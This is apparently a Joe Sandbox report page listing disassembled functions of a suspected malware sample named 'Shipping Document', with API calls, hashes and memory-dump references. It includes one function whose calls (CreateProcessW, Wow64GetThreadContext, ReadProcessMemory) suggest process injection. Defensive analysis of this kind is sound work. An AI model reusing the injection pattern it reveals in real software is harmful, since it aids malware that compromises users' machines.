Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ddca10068eb5e4cbe7ad801cf2310b957ede49741d0830538077be1fc6905c87
Instruction ID: d334abb05db924e4cbbf01e6cefff0216b6e5b586f5238bff6422716886ff552
Opcode Fuzzy Hash: ddca10068eb5e4cbe7ad801cf2310b957ede49741d0830538077be1fc6905c87
Instruction Fuzzy Hash: 1081AAB09092518FC3A4EF7DE65561D7AE6FB58304B12A12EA0D9CB35AEF3F44048F61

Function 00FC43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FC44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FC44C3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 926db12962b37474f17e24de2e767777cae642431f924951a0a28c3a15aa453e
Instruction ID: b18275480cbe878894999ce26db97c6c7f1c73922c0e10c9478cf288a4ea6092
Opcode Fuzzy Hash: 926db12962b37474f17e24de2e767777cae642431f924951a0a28c3a15aa453e
Instruction Fuzzy Hash: E73181B19087028FD724DF24D595B9BBBE8FB48314F10092EE9DAC7240D77AA948DB52

Function 00FE594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00FE5963

Part of subcall function 00FEA3AB: __NMSG_WRITE.LIBCMT ref: 00FEA3D2
Part of subcall function 00FEA3AB: __NMSG_WRITE.LIBCMT ref: 00FEA3DC

__NMSG_WRITE.LIBCMT ref: 00FE596A

Part of subcall function 00FEA408: GetModuleFileNameW.KERNEL32(00000000,010843BA,00000104,?,00000001,00000000), ref: 00FEA49A
Part of subcall function 00FEA408: ___crtMessageBoxW.LIBCMT ref: 00FEA548

Part of subcall function 00FE32DF: ___crtCorExitProcess.LIBCMT ref: 00FE32E5
Part of subcall function 00FE32DF: ExitProcess.KERNEL32 ref: 00FE32EE

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 33dde4e94fe22dc4ed22ea4c643a701e2fde8de97ba12c6ef29eab8d76e1a746
Instruction ID: 741993b4b8af1e8693950498cebf28ca4aac03783e8a661a6ad2327e8df99c17
Opcode Fuzzy Hash: 33dde4e94fe22dc4ed22ea4c643a701e2fde8de97ba12c6ef29eab8d76e1a746
Instruction Fuzzy Hash: E701F532604B96DEE6313B67DC46BAD72988F42F78F50002AF444EB2C2DE799D01B365

Function 01029B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,010297D2,?,?,?,?,?,00000004), ref: 01029B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,010297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 01029B5B
CloseHandle.KERNEL32(00000000,?,010297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01029B62

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c6a035ff35c1ce27369fbed9d2d75ff67f77e5327293b1935d2e74aaa4a0ebb9
Instruction ID: 458573ec4f9c95db11f1bb362fd686251be51e6ca3db2884bca8c4b1f083baa4
Opcode Fuzzy Hash: c6a035ff35c1ce27369fbed9d2d75ff67f77e5327293b1935d2e74aaa4a0ebb9
Instruction Fuzzy Hash: 77E08636180225B7EB311A58ED49FCA7F58AB06B65F108110FB94690E087B625119798

Function 01028F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01028FA5

Part of subcall function 00FE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE9C64), ref: 00FE2FA9
Part of subcall function 00FE2F95: GetLastError.KERNEL32(00000000,?,00FE9C64), ref: 00FE2FBB

_free.LIBCMT ref: 01028FB6
_free.LIBCMT ref: 01028FC8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction ID: 7544be8e301855afb99a78005edff81b99916fbf03bedbea9a1562e5c53cca6b
Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction Fuzzy Hash: 14E0C2A13087904AEAE4A5BDAD00E832BEE0F48211708084FF649DB142EE28E4419024

Function 00FCAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0100002B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 08666f8dd045df0155e62b2accf0a0ae7bb84822764719e6270f4e58f2afb54c
Instruction ID: 3282dafb19a4cf38a3b30b1aa95c3b47e56eb2e16c4bedfde6ca09c8af5e95e4
Opcode Fuzzy Hash: 08666f8dd045df0155e62b2accf0a0ae7bb84822764719e6270f4e58f2afb54c
Instruction Fuzzy Hash: 39226874508346CFD724DF14C996F6ABBE1BF84304F14895DE8868B262DB35EC81EB82

Function 00FC4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FC4E1A

Strings

EA06, xrefs: 00FFDCF5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 97afe06b075c5eb1b7e09d86143ee5fcfb6c1a93c5f9b882e19db317a5b30f9f
Instruction ID: 208bb2447c663bc00762e67ede4b169b6d0280927e29cbfeeb86f88bf7d4d2d0
Opcode Fuzzy Hash: 97afe06b075c5eb1b7e09d86143ee5fcfb6c1a93c5f9b882e19db317a5b30f9f
Instruction Fuzzy Hash: FF415E32E041565BDF219B648E73FBE7F66AB41310F19406DEC82DB182C525BD84B3A1

Function 00FC492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00FC4992

Part of subcall function 00FE35AC: __lock.LIBCMT ref: 00FE35B2
Part of subcall function 00FE35AC: DecodePointer.KERNEL32(00000001,?,00FC49A7,010181BC), ref: 00FE35BE
Part of subcall function 00FE35AC: EncodePointer.KERNEL32(?,?,00FC49A7,010181BC), ref: 00FE35C9

Part of subcall function 00FC4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FC4A73
Part of subcall function 00FC4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FC4A88

Part of subcall function 00FC3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC3B7A
Part of subcall function 00FC3B4C: IsDebuggerPresent.KERNEL32 ref: 00FC3B8C
Part of subcall function 00FC3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010862F8,010862E0,?,?), ref: 00FC3BFD
Part of subcall function 00FC3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00FC3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FC49D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 72f8ec42bb3368ea17f27a090b10f9c4be89d524b759ca46ef3138f84441f429
Instruction ID: 21c2af2e256dd0d1b67f72190dd14d91393fbede4af31a6c4f358df3f33cc44b
Opcode Fuzzy Hash: 72f8ec42bb3368ea17f27a090b10f9c4be89d524b759ca46ef3138f84441f429
Instruction Fuzzy Hash: 08118E719187129BC310DF29D94AE0EFBE8EB94710F00451EF4C5872A5DBBA9544DB92

Function 00FC5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FC5981,?,?,?,?), ref: 00FC5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FC5981,?,?,?,?), ref: 00FFE19C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33486ab3345960c05a6ec8692f72226ac9958e06dac5eb079a38bf389abc6520
Instruction ID: 84d18bd1ac8362775e5fb2b518be7597c9f8310cca86081aed6e0a5fca63085a
Opcode Fuzzy Hash: 33486ab3345960c05a6ec8692f72226ac9958e06dac5eb079a38bf389abc6520
Instruction Fuzzy Hash: 6401B571644709BFF3240E29CD8BF763B9CEB01B78F108319BAE55A1E0C6B42E859B50

Function 00FE0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE594C: __FF_MSGBANNER.LIBCMT ref: 00FE5963
Part of subcall function 00FE594C: __NMSG_WRITE.LIBCMT ref: 00FE596A
Part of subcall function 00FE594C: RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F

std::exception::exception.LIBCMT ref: 00FE102C
__CxxThrowException@8.LIBCMT ref: 00FE1041

Part of subcall function 00FE87DB: RaiseException.KERNEL32(?,?,?,0107BAF8,00000000,?,?,?,?,00FE1046,?,0107BAF8,?,00000001), ref: 00FE8830

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 582fa1a0961200b0494ce8bac776f90a947362a6afb84a695a0a1c0a2388e5be
Instruction ID: 026f9370e835f24a7cd2fbd39b19f0a4dbe5c7d40804ec36e918eb6c1aa66df7
Opcode Fuzzy Hash: 582fa1a0961200b0494ce8bac776f90a947362a6afb84a695a0a1c0a2388e5be
Instruction Fuzzy Hash: 76F0C8359003DDA6CB24BA5BEC159DF7BACAF01361F100426FD08A6691DF758EC1A2E5

Function 00FE582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE585C
__lock_file.LIBCMT ref: 00FE587D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 400d98256557c873ff2c5191cda19c0271313d591977ff5073eb37f24ad8eb01
Instruction ID: dd8c69ca46f146b3a0a1d9a48875774332dff531823be39d04b39107afc3002b
Opcode Fuzzy Hash: 400d98256557c873ff2c5191cda19c0271313d591977ff5073eb37f24ad8eb01
Instruction Fuzzy Hash: 9501AC71C01689EBCF11BF678C0559F7B61AF807A4F144215F8245B161DB35CB12FB51

Function 00FE55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

__lock_file.LIBCMT ref: 00FE561B

Part of subcall function 00FE6E4E: __lock.LIBCMT ref: 00FE6E71

__fclose_nolock.LIBCMT ref: 00FE5626

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 84f3bd9e84f476ae0f533e076ca0548fd1a36ec49c2c03e2b7e77798d58e281f
Instruction ID: b20910914a39f2b3d17e9706fc6a49a500a9ea1d7aefae49b35bfdedf43b21a3
Opcode Fuzzy Hash: 84f3bd9e84f476ae0f533e076ca0548fd1a36ec49c2c03e2b7e77798d58e281f
Instruction Fuzzy Hash: 49F09072C00A859ADB20BB778C0276E77A16F40B78F558209E428AB1C1CF7C8902BB55

Function 00FC81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00FC558F,?,?,?,?,?), ref: 00FC81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00FC558F,?,?,?,?,?), ref: 00FC820D

Part of subcall function 00FC78AD: _memmove.LIBCMT ref: 00FC78E9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: d84f7b2b0a0471781caf2b474731848cb86acee9e67be2dd982573fa183d0f4e
Instruction ID: 79c591df5ef61c4e55a787d7c0a0b506a62be1318a3e0e1d0302fb6f61beec27
Opcode Fuzzy Hash: d84f7b2b0a0471781caf2b474731848cb86acee9e67be2dd982573fa183d0f4e
Instruction Fuzzy Hash: 7501A2752012057FEB247A26DE4BFBB3B5CEB85760F10802AFD05CD190DE71D800A671

Function 01E512FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B73

Memory Dump Source

Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: b58de5c9cbf9604d9aaa90bfe807ccf94b4499f6f5b58a9717e2bcfe6f91cd6e
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 5C12EF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A

Function 00FCF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ad5e6f03d8f7f7ad5fd48d52440aa2eaf0d4bbdb2ca877332fd0513c8bc21d
Instruction ID: c3c389e3f7bf10b0b3dcdaccade73edf0c1865d9e9124b0561d684e9fc0bd1d5
Opcode Fuzzy Hash: d5ad5e6f03d8f7f7ad5fd48d52440aa2eaf0d4bbdb2ca877332fd0513c8bc21d
Instruction Fuzzy Hash: B3618A71A0020A9FDB14DF24CA82FAAB7E6EF44310F14847DEA4A87281D775ED59DB50

Function 00FD2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6743b4dac1821ee22af6390e2a51f4fc40dbe6590397980be479ce2395e9d8b4
Instruction ID: 6a67f3f21d65afa720bae448311b13112eb1a2ab7a66186c2d50c71255843cb8
Opcode Fuzzy Hash: 6743b4dac1821ee22af6390e2a51f4fc40dbe6590397980be479ce2395e9d8b4
Instruction Fuzzy Hash: 9D51D531600205AFDF15EB58CD92FAE77E6AF85710F188099F9469B382CB35ED40EB51

Function 00FC5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FC5CF6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0edd0e5ed245885d53fc7786f09bd694f9fc12f27fed18987782f4db9a1264fc
Instruction ID: e250512d6f74980b867d2f30c543c9a02284e543238830f07a1208fba834ed3e
Opcode Fuzzy Hash: 0edd0e5ed245885d53fc7786f09bd694f9fc12f27fed18987782f4db9a1264fc
Instruction Fuzzy Hash: A3316D71A00B0AAFCB18CF6DC585B6DB7B1FF48720F148619D81A93710D771B9A0EB90

Function 010000D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 010000E1

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9920e8a97ed0f5c0b51a3462e4e3426732d3a027313c3878e3dafd7b0ffaf7aa
Instruction ID: 537438aa2eb644e2613f50172a86da0e3d8f775fed40455e92e95ed8daa00d4f
Opcode Fuzzy Hash: 9920e8a97ed0f5c0b51a3462e4e3426732d3a027313c3878e3dafd7b0ffaf7aa
Instruction Fuzzy Hash: F8412774908342CFDB25DF19C585F1ABBE0BF45318F09889CE98A4B762C736E845DB52

Function 00FC5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FC5B61

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3736cafb92991f82614a90cedb94287a222d50c6183b1c15e27c2f4af532f354
